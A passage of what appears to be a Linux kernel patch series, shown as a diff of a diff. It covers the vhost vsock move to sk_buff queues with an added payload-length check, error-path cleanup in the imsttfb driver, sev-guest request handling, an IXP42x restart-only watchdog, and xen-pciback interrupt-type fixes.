+-	spin_lock_bh(&vsock->send_pkt_list_lock);
+-	list_add_tail(&pkt->list, &vsock->send_pkt_list);
+-	spin_unlock_bh(&vsock->send_pkt_list_lock);
+-
++	virtio_vsock_skb_queue_tail(&vsock->send_pkt_queue, skb);
+ 	vhost_work_queue(&vsock->dev, &vsock->send_pkt_work);
+ 
+ 	rcu_read_unlock();
+@@ -310,10 +295,8 @@ static int
+ vhost_transport_cancel_pkt(struct vsock_sock *vsk)
+ {
+ 	struct vhost_vsock *vsock;
+-	struct virtio_vsock_pkt *pkt, *n;
+ 	int cnt = 0;
+ 	int ret = -ENODEV;
+-	LIST_HEAD(freeme);
+ 
+ 	rcu_read_lock();
+ 
+@@ -322,20 +305,7 @@ vhost_transport_cancel_pkt(struct vsock_sock *vsk)
+ 	if (!vsock)
+ 		goto out;
+ 
+-	spin_lock_bh(&vsock->send_pkt_list_lock);
+-	list_for_each_entry_safe(pkt, n, &vsock->send_pkt_list, list) {
+-		if (pkt->vsk != vsk)
+-			continue;
+-		list_move(&pkt->list, &freeme);
+-	}
+-	spin_unlock_bh(&vsock->send_pkt_list_lock);
+-
+-	list_for_each_entry_safe(pkt, n, &freeme, list) {
+-		if (pkt->reply)
+-			cnt++;
+-		list_del(&pkt->list);
+-		virtio_transport_free_pkt(pkt);
+-	}
++	cnt = virtio_transport_purge_skbs(vsk, &vsock->send_pkt_queue);
+ 
+ 	if (cnt) {
+ 		struct vhost_virtqueue *tx_vq = &vsock->vqs[VSOCK_VQ_TX];
+@@ -352,12 +322,14 @@ out:
+ 	return ret;
+ }
+ 
+-static struct virtio_vsock_pkt *
+-vhost_vsock_alloc_pkt(struct vhost_virtqueue *vq,
++static struct sk_buff *
++vhost_vsock_alloc_skb(struct vhost_virtqueue *vq,
+ 		      unsigned int out, unsigned int in)
+ {
+-	struct virtio_vsock_pkt *pkt;
++	struct virtio_vsock_hdr *hdr;
+ 	struct iov_iter iov_iter;
++	struct sk_buff *skb;
++	size_t payload_len;
+ 	size_t nbytes;
+ 	size_t len;
+ 
+@@ -366,50 +338,48 @@ vhost_vsock_alloc_pkt(struct vhost_virtqueue *vq,
+ 		return NULL;
+ 	}
+ 
+-	pkt = kzalloc(sizeof(*pkt), GFP_KERNEL);
+-	if (!pkt)
++	len = iov_length(vq->iov, out);
++
++	/* len contains both payload and hdr */
++	skb = virtio_vsock_alloc_skb(len, GFP_KERNEL);
++	if (!skb)
+ 		return NULL;
+ 
+-	len = iov_length(vq->iov, out);
+ 	iov_iter_init(&iov_iter, ITER_SOURCE, vq->iov, out, len);
+ 
+-	nbytes = copy_from_iter(&pkt->hdr, sizeof(pkt->hdr), &iov_iter);
+-	if (nbytes != sizeof(pkt->hdr)) {
++	hdr = virtio_vsock_hdr(skb);
++	nbytes = copy_from_iter(hdr, sizeof(*hdr), &iov_iter);
++	if (nbytes != sizeof(*hdr)) {
+ 		vq_err(vq, "Expected %zu bytes for pkt->hdr, got %zu bytes\n",
+-		       sizeof(pkt->hdr), nbytes);
+-		kfree(pkt);
++		       sizeof(*hdr), nbytes);
++		kfree_skb(skb);
+ 		return NULL;
+ 	}
+ 
+-	pkt->len = le32_to_cpu(pkt->hdr.len);
++	payload_len = le32_to_cpu(hdr->len);
+ 
+ 	/* No payload */
+-	if (!pkt->len)
+-		return pkt;
++	if (!payload_len)
++		return skb;
+ 
+-	/* The pkt is too big */
+-	if (pkt->len > VIRTIO_VSOCK_MAX_PKT_BUF_SIZE) {
+-		kfree(pkt);
++	/* The pkt is too big or the length in the header is invalid */
++	if (payload_len > VIRTIO_VSOCK_MAX_PKT_BUF_SIZE ||
++	    payload_len + sizeof(*hdr) > len) {
++		kfree_skb(skb);
+ 		return NULL;
+ 	}
+ 
+-	pkt->buf = kvmalloc(pkt->len, GFP_KERNEL);
+-	if (!pkt->buf) {
+-		kfree(pkt);
+-		return NULL;
+-	}
++	virtio_vsock_skb_rx_put(skb);
+ 
+-	pkt->buf_len = pkt->len;
+-
+-	nbytes = copy_from_iter(pkt->buf, pkt->len, &iov_iter);
+-	if (nbytes != pkt->len) {
+-		vq_err(vq, "Expected %u byte payload, got %zu bytes\n",
+-		       pkt->len, nbytes);
+-		virtio_transport_free_pkt(pkt);
++	nbytes = copy_from_iter(skb->data, payload_len, &iov_iter);
++	if (nbytes != payload_len) {
++		vq_err(vq, "Expected %zu byte payload, got %zu bytes\n",
++		       payload_len, nbytes);
++		kfree_skb(skb);
+ 		return NULL;
+ 	}
+ 
+-	return pkt;
++	return skb;
+ }
+ 
+ /* Is there space left for replies to rx packets? */
+@@ -496,9 +466,9 @@ static void vhost_vsock_handle_tx_kick(struct vhost_work *work)
+ 						  poll.work);
+ 	struct vhost_vsock *vsock = container_of(vq->dev, struct vhost_vsock,
+ 						 dev);
+-	struct virtio_vsock_pkt *pkt;
+ 	int head, pkts = 0, total_len = 0;
+ 	unsigned int out, in;
++	struct sk_buff *skb;
+ 	bool added = false;
+ 
+ 	mutex_lock(&vq->mutex);
+@@ -511,6 +481,8 @@ static void vhost_vsock_handle_tx_kick(struct vhost_work *work)
+ 
+ 	vhost_disable_notify(&vsock->dev, vq);
+ 	do {
++		struct virtio_vsock_hdr *hdr;
++
+ 		if (!vhost_vsock_more_replies(vsock)) {
+ 			/* Stop tx until the device processes already
+ 			 * pending replies.  Leave tx virtqueue
+@@ -532,24 +504,26 @@ static void vhost_vsock_handle_tx_kick(struct vhost_work *work)
+ 			break;
+ 		}
+ 
+-		pkt = vhost_vsock_alloc_pkt(vq, out, in);
+-		if (!pkt) {
++		skb = vhost_vsock_alloc_skb(vq, out, in);
++		if (!skb) {
+ 			vq_err(vq, "Faulted on pkt\n");
+ 			continue;
+ 		}
+ 
+-		total_len += sizeof(pkt->hdr) + pkt->len;
++		total_len += sizeof(*hdr) + skb->len;
+ 
+ 		/* Deliver to monitoring devices all received packets */
+-		virtio_transport_deliver_tap_pkt(pkt);
++		virtio_transport_deliver_tap_pkt(skb);
++
++		hdr = virtio_vsock_hdr(skb);
+ 
+ 		/* Only accept correctly addressed packets */
+-		if (le64_to_cpu(pkt->hdr.src_cid) == vsock->guest_cid &&
+-		    le64_to_cpu(pkt->hdr.dst_cid) ==
++		if (le64_to_cpu(hdr->src_cid) == vsock->guest_cid &&
++		    le64_to_cpu(hdr->dst_cid) ==
+ 		    vhost_transport_get_local_cid())
+-			virtio_transport_recv_pkt(&vhost_transport, pkt);
++			virtio_transport_recv_pkt(&vhost_transport, skb);
+ 		else
+-			virtio_transport_free_pkt(pkt);
++			kfree_skb(skb);
+ 
+ 		vhost_add_used(vq, head, 0);
+ 		added = true;
+@@ -693,8 +667,7 @@ static int vhost_vsock_dev_open(struct inode *inode, struct file *file)
+ 		       VHOST_VSOCK_WEIGHT, true, NULL);
+ 
+ 	file->private_data = vsock;
+-	spin_lock_init(&vsock->send_pkt_list_lock);
+-	INIT_LIST_HEAD(&vsock->send_pkt_list);
++	skb_queue_head_init(&vsock->send_pkt_queue);
+ 	vhost_work_init(&vsock->send_pkt_work, vhost_transport_send_pkt_work);
+ 	return 0;
+ 
+@@ -760,16 +733,7 @@ static int vhost_vsock_dev_release(struct inode *inode, struct file *file)
+ 	vhost_vsock_flush(vsock);
+ 	vhost_dev_stop(&vsock->dev);
+ 
+-	spin_lock_bh(&vsock->send_pkt_list_lock);
+-	while (!list_empty(&vsock->send_pkt_list)) {
+-		struct virtio_vsock_pkt *pkt;
+-
+-		pkt = list_first_entry(&vsock->send_pkt_list,
+-				struct virtio_vsock_pkt, list);
+-		list_del_init(&pkt->list);
+-		virtio_transport_free_pkt(pkt);
+-	}
+-	spin_unlock_bh(&vsock->send_pkt_list_lock);
++	virtio_vsock_skb_queue_purge(&vsock->send_pkt_queue);
+ 
+ 	vhost_dev_cleanup(&vsock->dev);
+ 	kfree(vsock->dev.vqs);
+diff --git a/drivers/video/fbdev/fsl-diu-fb.c b/drivers/video/fbdev/fsl-diu-fb.c
+index e332017c6af62..ce3c5b0b8f4ef 100644
+--- a/drivers/video/fbdev/fsl-diu-fb.c
++++ b/drivers/video/fbdev/fsl-diu-fb.c
+@@ -490,7 +490,7 @@ static enum fsl_diu_monitor_port fsl_diu_name_to_port(const char *s)
+  * Workaround for failed writing desc register of planes.
+  * Needed with MPC5121 DIU rev 2.0 silicon.
+  */
+-void wr_reg_wa(u32 *reg, u32 val)
++static void wr_reg_wa(u32 *reg, u32 val)
+ {
+ 	do {
+ 		out_be32(reg, val);
+diff --git a/drivers/video/fbdev/imsttfb.c b/drivers/video/fbdev/imsttfb.c
+index e6adb2890ecfe..b194e71f07bfc 100644
+--- a/drivers/video/fbdev/imsttfb.c
++++ b/drivers/video/fbdev/imsttfb.c
+@@ -1495,8 +1495,8 @@ static int imsttfb_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	if (!request_mem_region(addr, size, "imsttfb")) {
+ 		printk(KERN_ERR "imsttfb: Can't reserve memory region\n");
+-		framebuffer_release(info);
+-		return -ENODEV;
++		ret = -ENODEV;
++		goto release_info;
+ 	}
+ 
+ 	switch (pdev->device) {
+@@ -1513,34 +1513,39 @@ static int imsttfb_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 			printk(KERN_INFO "imsttfb: Device 0x%x unknown, "
+ 					 "contact maintainer.\n", pdev->device);
+ 			ret = -ENODEV;
+-			goto error;
++			goto release_mem_region;
+ 	}
+ 
+ 	info->fix.smem_start = addr;
+ 	info->screen_base = (__u8 *)ioremap(addr, par->ramdac == IBM ?
+ 					    0x400000 : 0x800000);
+ 	if (!info->screen_base)
+-		goto error;
++		goto release_mem_region;
+ 	info->fix.mmio_start = addr + 0x800000;
+ 	par->dc_regs = ioremap(addr + 0x800000, 0x1000);
+ 	if (!par->dc_regs)
+-		goto error;
++		goto unmap_screen_base;
+ 	par->cmap_regs_phys = addr + 0x840000;
+ 	par->cmap_regs = (__u8 *)ioremap(addr + 0x840000, 0x1000);
+ 	if (!par->cmap_regs)
+-		goto error;
++		goto unmap_dc_regs;
+ 	info->pseudo_palette = par->palette;
+ 	ret = init_imstt(info);
+-	if (!ret)
+-		pci_set_drvdata(pdev, info);
+-	return ret;
++	if (ret)
++		goto unmap_cmap_regs;
+ 
+-error:
+-	if (par->dc_regs)
+-		iounmap(par->dc_regs);
+-	if (info->screen_base)
+-		iounmap(info->screen_base);
++	pci_set_drvdata(pdev, info);
++	return 0;
++
++unmap_cmap_regs:
++	iounmap(par->cmap_regs);
++unmap_dc_regs:
++	iounmap(par->dc_regs);
++unmap_screen_base:
++	iounmap(info->screen_base);
++release_mem_region:
+ 	release_mem_region(addr, size);
++release_info:
+ 	framebuffer_release(info);
+ 	return ret;
+ }
+diff --git a/drivers/virt/coco/sev-guest/sev-guest.c b/drivers/virt/coco/sev-guest/sev-guest.c
+index 9e172f66a8edb..c47e54b2a865e 100644
+--- a/drivers/virt/coco/sev-guest/sev-guest.c
++++ b/drivers/virt/coco/sev-guest/sev-guest.c
+@@ -57,6 +57,11 @@ struct snp_guest_dev {
+ 
+ 	struct snp_secrets_page_layout *layout;
+ 	struct snp_req_data input;
++	union {
++		struct snp_report_req report;
++		struct snp_derived_key_req derived_key;
++		struct snp_ext_report_req ext_report;
++	} req;
+ 	u32 *os_area_msg_seqno;
+ 	u8 *vmpck;
+ };
+@@ -334,11 +339,12 @@ static int enc_payload(struct snp_guest_dev *snp_dev, u64 seqno, int version, u8
+ 	return __enc_payload(snp_dev, req, payload, sz);
+ }
+ 
+-static int __handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, __u64 *fw_err)
++static int __handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code,
++				  struct snp_guest_request_ioctl *rio)
+ {
+-	unsigned long err = 0xff, override_err = 0;
+ 	unsigned long req_start = jiffies;
+ 	unsigned int override_npages = 0;
++	u64 override_err = 0;
+ 	int rc;
+ 
+ retry_request:
+@@ -348,7 +354,7 @@ retry_request:
+ 	 * sequence number must be incremented or the VMPCK must be deleted to
+ 	 * prevent reuse of the IV.
+ 	 */
+-	rc = snp_issue_guest_request(exit_code, &snp_dev->input, &err);
++	rc = snp_issue_guest_request(exit_code, &snp_dev->input, rio);
+ 	switch (rc) {
+ 	case -ENOSPC:
+ 		/*
+@@ -366,7 +372,7 @@ retry_request:
+ 		 * request buffer size was too small and give the caller the
+ 		 * required buffer size.
+ 		 */
+-		override_err	= SNP_GUEST_REQ_INVALID_LEN;
++		override_err = SNP_GUEST_VMM_ERR(SNP_GUEST_VMM_ERR_INVALID_LEN);
+ 
+ 		/*
+ 		 * If this call to the firmware succeeds, the sequence number can
+@@ -379,7 +385,7 @@ retry_request:
+ 		goto retry_request;
+ 
+ 	/*
+-	 * The host may return SNP_GUEST_REQ_ERR_EBUSY if the request has been
++	 * The host may return SNP_GUEST_VMM_ERR_BUSY if the request has been
+ 	 * throttled. Retry in the driver to avoid returning and reusing the
+ 	 * message sequence number on a different message.
+ 	 */
+@@ -400,27 +406,29 @@ retry_request:
+ 	 */
+ 	snp_inc_msg_seqno(snp_dev);
+ 
+-	if (fw_err)
+-		*fw_err = override_err ?: err;
++	if (override_err) {
++		rio->exitinfo2 = override_err;
++
++		/*
++		 * If an extended guest request was issued and the supplied certificate
++		 * buffer was not large enough, a standard guest request was issued to
++		 * prevent IV reuse. If the standard request was successful, return -EIO
++		 * back to the caller as would have originally been returned.
++		 */
++		if (!rc && override_err == SNP_GUEST_VMM_ERR(SNP_GUEST_VMM_ERR_INVALID_LEN))
++			rc = -EIO;
++	}
+ 
+ 	if (override_npages)
+ 		snp_dev->input.data_npages = override_npages;
+ 
+-	/*
+-	 * If an extended guest request was issued and the supplied certificate
+-	 * buffer was not large enough, a standard guest request was issued to
+-	 * prevent IV reuse. If the standard request was successful, return -EIO
+-	 * back to the caller as would have originally been returned.
+-	 */
+-	if (!rc && override_err == SNP_GUEST_REQ_INVALID_LEN)
+-		return -EIO;
+-
+ 	return rc;
+ }
+ 
+-static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, int msg_ver,
+-				u8 type, void *req_buf, size_t req_sz, void *resp_buf,
+-				u32 resp_sz, __u64 *fw_err)
++static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code,
++				struct snp_guest_request_ioctl *rio, u8 type,
++				void *req_buf, size_t req_sz, void *resp_buf,
++				u32 resp_sz)
+ {
+ 	u64 seqno;
+ 	int rc;
+@@ -434,7 +442,7 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	memset(snp_dev->response, 0, sizeof(struct snp_guest_msg));
+ 
+ 	/* Encrypt the userspace provided payload in snp_dev->secret_request. */
+-	rc = enc_payload(snp_dev, seqno, msg_ver, type, req_buf, req_sz);
++	rc = enc_payload(snp_dev, seqno, rio->msg_version, type, req_buf, req_sz);
+ 	if (rc)
+ 		return rc;
+ 
+@@ -445,12 +453,16 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	memcpy(snp_dev->request, &snp_dev->secret_request,
+ 	       sizeof(snp_dev->secret_request));
+ 
+-	rc = __handle_guest_request(snp_dev, exit_code, fw_err);
++	rc = __handle_guest_request(snp_dev, exit_code, rio);
+ 	if (rc) {
+-		if (rc == -EIO && *fw_err == SNP_GUEST_REQ_INVALID_LEN)
++		if (rc == -EIO &&
++		    rio->exitinfo2 == SNP_GUEST_VMM_ERR(SNP_GUEST_VMM_ERR_INVALID_LEN))
+ 			return rc;
+ 
+-		dev_alert(snp_dev->dev, "Detected error from ASP request. rc: %d, fw_err: %llu\n", rc, *fw_err);
++		dev_alert(snp_dev->dev,
++			  "Detected error from ASP request. rc: %d, exitinfo2: 0x%llx\n",
++			  rc, rio->exitinfo2);
++
+ 		snp_disable_vmpck(snp_dev);
+ 		return rc;
+ 	}
+@@ -468,8 +480,8 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ static int get_report(struct snp_guest_dev *snp_dev, struct snp_guest_request_ioctl *arg)
+ {
+ 	struct snp_guest_crypto *crypto = snp_dev->crypto;
++	struct snp_report_req *req = &snp_dev->req.report;
+ 	struct snp_report_resp *resp;
+-	struct snp_report_req req;
+ 	int rc, resp_len;
+ 
+ 	lockdep_assert_held(&snp_cmd_mutex);
+@@ -477,7 +489,7 @@ static int get_report(struct snp_guest_dev *snp_dev, struct snp_guest_request_io
+ 	if (!arg->req_data || !arg->resp_data)
+ 		return -EINVAL;
+ 
+-	if (copy_from_user(&req, (void __user *)arg->req_data, sizeof(req)))
++	if (copy_from_user(req, (void __user *)arg->req_data, sizeof(*req)))
+ 		return -EFAULT;
+ 
+ 	/*
+@@ -490,9 +502,9 @@ static int get_report(struct snp_guest_dev *snp_dev, struct snp_guest_request_io
+ 	if (!resp)
+ 		return -ENOMEM;
+ 
+-	rc = handle_guest_request(snp_dev, SVM_VMGEXIT_GUEST_REQUEST, arg->msg_version,
+-				  SNP_MSG_REPORT_REQ, &req, sizeof(req), resp->data,
+-				  resp_len, &arg->fw_err);
++	rc = handle_guest_request(snp_dev, SVM_VMGEXIT_GUEST_REQUEST, arg,
++				  SNP_MSG_REPORT_REQ, req, sizeof(*req), resp->data,
++				  resp_len);
+ 	if (rc)
+ 		goto e_free;
+ 
+@@ -506,9 +518,9 @@ e_free:
+ 
+ static int get_derived_key(struct snp_guest_dev *snp_dev, struct snp_guest_request_ioctl *arg)
+ {
++	struct snp_derived_key_req *req = &snp_dev->req.derived_key;
+ 	struct snp_guest_crypto *crypto = snp_dev->crypto;
+ 	struct snp_derived_key_resp resp = {0};
+-	struct snp_derived_key_req req;
+ 	int rc, resp_len;
+ 	/* Response data is 64 bytes and max authsize for GCM is 16 bytes. */
+ 	u8 buf[64 + 16];
+@@ -527,12 +539,11 @@ static int get_derived_key(struct snp_guest_dev *snp_dev, struct snp_guest_reque
+ 	if (sizeof(buf) < resp_len)
+ 		return -ENOMEM;
+ 
+-	if (copy_from_user(&req, (void __user *)arg->req_data, sizeof(req)))
++	if (copy_from_user(req, (void __user *)arg->req_data, sizeof(*req)))
+ 		return -EFAULT;
+ 
+-	rc = handle_guest_request(snp_dev, SVM_VMGEXIT_GUEST_REQUEST, arg->msg_version,
+-				  SNP_MSG_KEY_REQ, &req, sizeof(req), buf, resp_len,
+-				  &arg->fw_err);
++	rc = handle_guest_request(snp_dev, SVM_VMGEXIT_GUEST_REQUEST, arg,
++				  SNP_MSG_KEY_REQ, req, sizeof(*req), buf, resp_len);
+ 	if (rc)
+ 		return rc;
+ 
+@@ -548,8 +559,8 @@ static int get_derived_key(struct snp_guest_dev *snp_dev, struct snp_guest_reque
+ 
+ static int get_ext_report(struct snp_guest_dev *snp_dev, struct snp_guest_request_ioctl *arg)
+ {
++	struct snp_ext_report_req *req = &snp_dev->req.ext_report;
+ 	struct snp_guest_crypto *crypto = snp_dev->crypto;
+-	struct snp_ext_report_req req;
+ 	struct snp_report_resp *resp;
+ 	int ret, npages = 0, resp_len;
+ 
+@@ -558,18 +569,18 @@ static int get_ext_report(struct snp_guest_dev *snp_dev, struct snp_guest_reques
+ 	if (!arg->req_data || !arg->resp_data)
+ 		return -EINVAL;
+ 
+-	if (copy_from_user(&req, (void __user *)arg->req_data, sizeof(req)))
++	if (copy_from_user(req, (void __user *)arg->req_data, sizeof(*req)))
+ 		return -EFAULT;
+ 
+ 	/* userspace does not want certificate data */
+-	if (!req.certs_len || !req.certs_address)
++	if (!req->certs_len || !req->certs_address)
+ 		goto cmd;
+ 
+-	if (req.certs_len > SEV_FW_BLOB_MAX_SIZE ||
+-	    !IS_ALIGNED(req.certs_len, PAGE_SIZE))
++	if (req->certs_len > SEV_FW_BLOB_MAX_SIZE ||
++	    !IS_ALIGNED(req->certs_len, PAGE_SIZE))
+ 		return -EINVAL;
+ 
+-	if (!access_ok((const void __user *)req.certs_address, req.certs_len))
++	if (!access_ok((const void __user *)req->certs_address, req->certs_len))
+ 		return -EFAULT;
+ 
+ 	/*
+@@ -578,8 +589,8 @@ static int get_ext_report(struct snp_guest_dev *snp_dev, struct snp_guest_reques
+ 	 * the host. If host does not supply any certs in it, then copy
+ 	 * zeros to indicate that certificate data was not provided.
+ 	 */
+-	memset(snp_dev->certs_data, 0, req.certs_len);
+-	npages = req.certs_len >> PAGE_SHIFT;
++	memset(snp_dev->certs_data, 0, req->certs_len);
++	npages = req->certs_len >> PAGE_SHIFT;
+ cmd:
+ 	/*
+ 	 * The intermediate response buffer is used while decrypting the
+@@ -592,15 +603,15 @@ cmd:
+ 		return -ENOMEM;
+ 
+ 	snp_dev->input.data_npages = npages;
+-	ret = handle_guest_request(snp_dev, SVM_VMGEXIT_EXT_GUEST_REQUEST, arg->msg_version,
+-				   SNP_MSG_REPORT_REQ, &req.data,
+-				   sizeof(req.data), resp->data, resp_len, &arg->fw_err);
++	ret = handle_guest_request(snp_dev, SVM_VMGEXIT_EXT_GUEST_REQUEST, arg,
++				   SNP_MSG_REPORT_REQ, &req->data,
++				   sizeof(req->data), resp->data, resp_len);
+ 
+ 	/* If certs length is invalid then copy the returned length */
+-	if (arg->fw_err == SNP_GUEST_REQ_INVALID_LEN) {
+-		req.certs_len = snp_dev->input.data_npages << PAGE_SHIFT;
++	if (arg->vmm_error == SNP_GUEST_VMM_ERR_INVALID_LEN) {
++		req->certs_len = snp_dev->input.data_npages << PAGE_SHIFT;
+ 
+-		if (copy_to_user((void __user *)arg->req_data, &req, sizeof(req)))
++		if (copy_to_user((void __user *)arg->req_data, req, sizeof(*req)))
+ 			ret = -EFAULT;
+ 	}
+ 
+@@ -608,8 +619,8 @@ cmd:
+ 		goto e_free;
+ 
+ 	if (npages &&
+-	    copy_to_user((void __user *)req.certs_address, snp_dev->certs_data,
+-			 req.certs_len)) {
++	    copy_to_user((void __user *)req->certs_address, snp_dev->certs_data,
++			 req->certs_len)) {
+ 		ret = -EFAULT;
+ 		goto e_free;
+ 	}
+@@ -632,7 +643,7 @@ static long snp_guest_ioctl(struct file *file, unsigned int ioctl, unsigned long
+ 	if (copy_from_user(&input, argp, sizeof(input)))
+ 		return -EFAULT;
+ 
+-	input.fw_err = 0xff;
++	input.exitinfo2 = 0xff;
+ 
+ 	/* Message version must be non-zero */
+ 	if (!input.msg_version)
+@@ -663,7 +674,7 @@ static long snp_guest_ioctl(struct file *file, unsigned int ioctl, unsigned long
+ 
+ 	mutex_unlock(&snp_cmd_mutex);
+ 
+-	if (input.fw_err && copy_to_user(argp, &input, sizeof(input)))
++	if (input.exitinfo2 && copy_to_user(argp, &input, sizeof(input)))
+ 		return -EFAULT;
+ 
+ 	return ret;
+diff --git a/drivers/watchdog/ixp4xx_wdt.c b/drivers/watchdog/ixp4xx_wdt.c
+index 281a48d9889fc..0fc91e9c4a773 100644
+--- a/drivers/watchdog/ixp4xx_wdt.c
++++ b/drivers/watchdog/ixp4xx_wdt.c
+@@ -105,6 +105,25 @@ static const struct watchdog_ops ixp4xx_wdt_ops = {
+ 	.owner = THIS_MODULE,
+ };
+ 
++/*
++ * The A0 version of the IXP422 had a bug in the watchdog making
++ * it useless, but we still need to use it to restart the system
++ * as it is the only way, so in this special case we register a
++ * "dummy" watchdog that doesn't really work, but will support
++ * the restart operation.
++ */
++static int ixp4xx_wdt_dummy(struct watchdog_device *wdd)
++{
++	return 0;
++}
++
++static const struct watchdog_ops ixp4xx_wdt_restart_only_ops = {
++	.start = ixp4xx_wdt_dummy,
++	.stop = ixp4xx_wdt_dummy,
++	.restart = ixp4xx_wdt_restart,
++	.owner = THIS_MODULE,
++};
++
+ static const struct watchdog_info ixp4xx_wdt_info = {
+ 	.options = WDIOF_KEEPALIVEPING
+ 		| WDIOF_MAGICCLOSE
+@@ -120,14 +139,17 @@ static void ixp4xx_clock_action(void *d)
+ 
+ static int ixp4xx_wdt_probe(struct platform_device *pdev)
+ {
++	static const struct watchdog_ops *iwdt_ops;
+ 	struct device *dev = &pdev->dev;
+ 	struct ixp4xx_wdt *iwdt;
+ 	struct clk *clk;
+ 	int ret;
+ 
+ 	if (!(read_cpuid_id() & 0xf) && !cpu_is_ixp46x()) {
+-		dev_err(dev, "Rev. A0 IXP42x CPU detected - watchdog disabled\n");
+-		return -ENODEV;
++		dev_info(dev, "Rev. A0 IXP42x CPU detected - only restart supported\n");
++		iwdt_ops = &ixp4xx_wdt_restart_only_ops;
++	} else {
++		iwdt_ops = &ixp4xx_wdt_ops;
+ 	}
+ 
+ 	iwdt = devm_kzalloc(dev, sizeof(*iwdt), GFP_KERNEL);
+@@ -153,7 +175,7 @@ static int ixp4xx_wdt_probe(struct platform_device *pdev)
+ 		iwdt->rate = IXP4XX_TIMER_FREQ;
+ 
+ 	iwdt->wdd.info = &ixp4xx_wdt_info;
+-	iwdt->wdd.ops = &ixp4xx_wdt_ops;
++	iwdt->wdd.ops = iwdt_ops;
+ 	iwdt->wdd.min_timeout = 1;
+ 	iwdt->wdd.max_timeout = U32_MAX / iwdt->rate;
+ 	iwdt->wdd.parent = dev;
+diff --git a/drivers/xen/xen-pciback/conf_space.c b/drivers/xen/xen-pciback/conf_space.c
+index 059de92aea7d0..d47eee6c51435 100644
+--- a/drivers/xen/xen-pciback/conf_space.c
++++ b/drivers/xen/xen-pciback/conf_space.c
+@@ -288,12 +288,6 @@ int xen_pcibk_get_interrupt_type(struct pci_dev *dev)
+ 	u16 val;
+ 	int ret = 0;
+ 
+-	err = pci_read_config_word(dev, PCI_COMMAND, &val);
+-	if (err)
+-		return err;
+-	if (!(val & PCI_COMMAND_INTX_DISABLE))
+-		ret |= INTERRUPT_TYPE_INTX;
+-
+ 	/*
+ 	 * Do not trust dev->msi(x)_enabled here, as enabling could be done
+ 	 * bypassing the pci_*msi* functions, by the qemu.
+@@ -316,6 +310,19 @@ int xen_pcibk_get_interrupt_type(struct pci_dev *dev)
+ 		if (val & PCI_MSIX_FLAGS_ENABLE)
+ 			ret |= INTERRUPT_TYPE_MSIX;
+ 	}
++
++	/*
++	 * The PCIe spec says a device cannot use INTx if MSI/MSI-X is enabled,
++	 * so check for INTx only when both are disabled.
++	 */
++	if (!ret) {
++		err = pci_read_config_word(dev, PCI_COMMAND, &val);
++		if (err)
++			return err;
++		if (!(val & PCI_COMMAND_INTX_DISABLE))
++			ret |= INTERRUPT_TYPE_INTX;
++	}
++
+ 	return ret ?: INTERRUPT_TYPE_NONE;
+ }
+ 
+diff --git a/drivers/xen/xen-pciback/conf_space_capability.c b/drivers/xen/xen-pciback/conf_space_capability.c
+index 097316a741268..1948a9700c8fa 100644
+--- a/drivers/xen/xen-pciback/conf_space_capability.c
++++ b/drivers/xen/xen-pciback/conf_space_capability.c
+@@ -236,10 +236,16 @@ static int msi_msix_flags_write(struct pci_dev *dev, int offset, u16 new_value,
+ 		return PCIBIOS_SET_FAILED;
+ 
+ 	if (new_value & field_config->enable_bit) {
+-		/* don't allow enabling together with other interrupt types */
++		/*
++		 * Don't allow enabling together with other interrupt types, but do
++		 * allow enabling MSI(-X) while INTx is still active to please Linux's
++		 * MSI(-X) startup sequence. It is safe to do, as according to the PCI
++		 * spec, a device with MSI(-X) enabled shouldn't use INTx.
++		 */
+ 		int int_type = xen_pcibk_get_interrupt_type(dev);
+ 
+ 		if (int_type == INTERRUPT_TYPE_NONE ||
++		    int_type == INTERRUPT_TYPE_INTX ||
+ 		    int_type == field_config->int_type)
+ 			goto write;
+ 		return PCIBIOS_SET_FAILED;
+diff --git a/drivers/xen/xen-pciback/conf_space_header.c b/drivers/xen/xen-pciback/conf_space_header.c
+index 981435103af1a..fc03326459664 100644
+--- a/drivers/xen/xen-pciback/conf_space_header.c
++++ b/drivers/xen/xen-pciback/conf_space_header.c
+@@ -104,24 +104,9 @@ static int command_write(struct pci_dev *dev, int offset, u16 value, void *data)
+ 		pci_clear_mwi(dev);
+ 	}
+ 
+-	if (dev_data && dev_data->allow_interrupt_control) {
+-		if ((cmd->val ^ value) & PCI_COMMAND_INTX_DISABLE) {
+-			if (value & PCI_COMMAND_INTX_DISABLE) {
+-				pci_intx(dev, 0);
+-			} else {
+-				/* Do not allow enabling INTx together with MSI or MSI-X. */
+-				switch (xen_pcibk_get_interrupt_type(dev)) {
+-				case INTERRUPT_TYPE_NONE:
+-					pci_intx(dev, 1);
+-					break;
+-				case INTERRUPT_TYPE_INTX:
+-					break;
+-				default:
+-					return PCIBIOS_SET_FAILED;
+-				}
+-			}
+-		}
+-	}
++	if (dev_data && dev_data->allow_interrupt_control &&
++	    ((cmd->val ^ value) & PCI_COMMAND_INTX_DISABLE))
++		pci_intx(dev, !(value & PCI_COMMAND_INTX_DISABLE));
+ 
+ 	cmd->val = value;
+ 
+diff --git a/drivers/xen/xenbus/xenbus_probe.c b/drivers/xen/xenbus/xenbus_probe.c
+index 639bf628389ba..3205e5d724c8c 100644
+--- a/drivers/xen/xenbus/xenbus_probe.c
++++ b/drivers/xen/xenbus/xenbus_probe.c
+@@ -1025,7 +1025,7 @@ static int __init xenbus_init(void)
+ 			if (err < 0) {
+ 				pr_err("xenstore_late_init couldn't bind irq err=%d\n",
+ 				       err);
+-				return err;
++				goto out_error;
+ 			}
+ 
+ 			xs_init_irq = err;
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 9474265ee7ea3..e015e1e025b6e 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -2420,7 +2420,7 @@ static noinline int key_in_sk(struct btrfs_key *key,
+ static noinline int copy_to_sk(struct btrfs_path *path,
+ 			       struct btrfs_key *key,
+ 			       struct btrfs_ioctl_search_key *sk,
+-			       size_t *buf_size,
++			       u64 *buf_size,
+ 			       char __user *ubuf,
+ 			       unsigned long *sk_offset,
+ 			       int *num_found)
